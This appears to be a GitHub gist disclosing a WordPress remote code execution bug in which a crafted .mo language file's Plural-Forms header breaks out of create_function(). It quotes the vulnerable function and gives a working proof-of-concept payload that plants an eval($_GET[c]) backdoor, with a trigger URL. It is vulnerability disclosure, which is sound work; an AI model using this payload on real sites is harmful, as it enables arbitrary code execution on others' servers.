Skip to content

Instantly share code, notes, and snippets.

/.md Secret

Created October 8, 2016 13:05
Embed
What would you like to do?
WordPress RCE via specially crafted .mo language file

WordPress RCE via specially crafted .mo language file

The vulnerability code in wp-includes/pomo/translations.php:

  function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
  }

PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use } close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment